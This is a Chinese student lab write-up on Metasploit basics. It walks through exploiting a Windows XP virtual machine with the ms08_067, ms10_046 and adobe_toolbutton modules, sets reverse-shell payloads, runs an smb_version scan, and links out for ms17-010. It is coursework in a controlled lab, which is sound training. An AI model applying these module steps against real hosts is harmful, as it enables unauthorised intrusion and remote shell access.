20154313 刘文亨 EXP5

20154313Exp5 MSF基础应用

20154313 刘文亨

 

一、 实践内容

目录

· 主动攻击:ms08_067漏洞攻击

· 对浏览器攻击:ms10_046漏洞攻击

· Adobe的漏洞攻击:adobe_toolbutton

· 辅助模块的应用:smb_version

实验环境配置

· 攻击机:Kali

· 靶机: `windows XP SP3(English)

 

二、 基础问题

问题:如用自己的话解释什么是exploit,payload,encode

①exploit就相当于是载具,将真正要负责攻击的代码传送到靶机中,我觉得老师上课举的火箭和卫星的例子非常形象,火箭只是运载工具,它把卫星送入轨道就完成了它的任务,exploit的功能就和火箭差不多。

②payload也就相当于载荷,实际上就是之前我们实验中做到的shellcode,exploit把它传送到靶机中后,它就负责执行相应的攻击代码。

③encode也就是编码,它主要是为了避免之前的payload中出现坏字符,从而影响payload的功能,其次是为了实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。

 

三、实验过程

1. 主动攻击:ms08_067漏洞攻击

参考学长的报告内容,选用XP英文版虚拟机。

· 

 

· Kali上使用msfconsole指令进入msf控制台。

· 

kali主机键入search ms08_067 指令查询一下针对该漏洞可以运用的攻击模块:

 

· 

· 

键入use exploit/windows/smb/ms08_067_netapi ,使用该模块,再使用show payloads查看可以供我们使用的payload

 

· 

 

· 我们的目的是为了获取靶机的shell,因此这里我们选择通过反向连接来获取shellgeneric/shell_reverse_tcp。当payload,使用指令set payload generic/shell_reverse_tcppayload进行设置。

· 

接着使用指令show options查看我们需要设置的参数,发现需要设置一个RHOST(远程主机,即靶机的IP地址)和一个LHOST(本地主机,即攻击机的IP地址):

 

· 

· 

设置完相应的参数后,再次使用show options对攻击的选项进行查看:

 

· 

· 

接着使用exploit指令开始攻击,攻击成功后获取了靶机的shell,使用systeminfo指令查看靶机系统信息:

 

· 

2. 对浏览器攻击:ms10_046漏洞攻击

· 

基本步骤还是和上面一样,先利用search ms10_046指令查看可以运用的攻击模块:

 

· 

· 

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader使用该模块,再使用show payloads查看可以供我们使用的payload

 

· 

· 

然后查看需要设置的参数,SRVHOST填的是本地监听主机的IP地址,LHOST也是监听的IP地址,所以这里SRVHOSTLHOST都应该填攻击机的IP地址:

· 

· 

· 

· 

设置好参数后,进行查看:

 

· 

· 

使用exploit指令执行漏洞,可以看到生成了一个url:

· 

 

· 

在靶机的IE浏览器上使用该url进行访问,在MSF终端看见漏洞执行成功:

 

 

· 

· 

3. 对Adobe的漏洞攻击:adobe_toolbutton

先使用search adobe查询和adobe漏洞有关的模块,我选择的是use exploit/windows/fileformat/adobe_toolbutton,然后使用该模块,设置回连的payload

 

· 

查看需要设置的参数:

 

· 

· 

设置好相应参数后,开始实施攻击,发现在/root/.msf4/local/目录下成功生成了一个lxm.pdf文件:

 

 

 

· 

然后将该文件传送到靶机上,并且在攻击机上打开监听:

 

· 

· 

将靶机中的pdf文件打开,攻击机成功获取到靶机shell

 

· 

4. 辅助模块的应用:smb_version

· 使用show auxiliary查看可以运用的辅助模块。

 

· 我使用的是scanner/smb/smb_version,用来对靶机的smb版本进行扫描。

· 

设置靶机的IP地址(也可以设置要扫描的一段范围),以及扫描使用的线程:

 

· 

· 

使用exploit指令开始扫描,成功扫描到靶机的smb版本:

 

· 

5. smb(ms17-010)远程命令执行之msf

· https://www.cnblogs.com/backlion/p/6804863.html
按照这个操作可以实现。

· 

四、 实验体会

   这次实验我懂得了很多系统和软件都存在着漏洞,我们要及时为其打好补丁,小心被黑客入侵,也可以尝试寻找各种漏洞攻入。

 

posted @ 2018-05-01 20:52  20154313_刘文亨  阅读(117)  评论(0编辑  收藏